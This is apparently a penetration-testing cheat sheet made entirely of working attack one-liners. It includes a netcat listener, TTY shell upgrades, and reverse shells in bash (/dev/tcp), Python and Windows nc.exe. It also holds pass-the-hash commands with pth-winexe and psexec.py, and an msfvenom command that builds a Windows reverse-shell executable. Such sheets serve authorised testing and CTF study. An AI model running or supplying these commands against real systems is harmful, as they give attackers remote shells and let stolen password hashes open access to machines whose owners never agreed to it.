Shell
Linux listening on a port
# Listen to port
$ nc -lvnp [port]
Linux TTY shells
# sh
$ /bin/sh -i
# Perl
$ perl -e 'exec("/bin/sh");'
# Python
$ python3 -c 'import pty; pty.spawn("/bin/sh")'
Linux reverse TCP shell
# Bash
$ bash -i >& /dev/tcp/[ip]/[port] 0>&1
# Python
$ python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[ip]",[port]));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
Windows reverse shell
# nc.exe
$ nc.exe [ip] [port] -e cmd.exe
Pass The Hash (PTH) Attack
# PTH Attack
# winexe + PTH
$ pth-winexe -U [user]%[LM:NTLM] //[ip] cmd.exe
# psexec.py + PTH
$ psexec.py -hashes [LM]:[NTLM] [user]@[ip]
msfvenom example usage
# Examples
# Windows shell
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=[ip] LPORT=[port] EXITFUNC=thread -f exe > shell.exe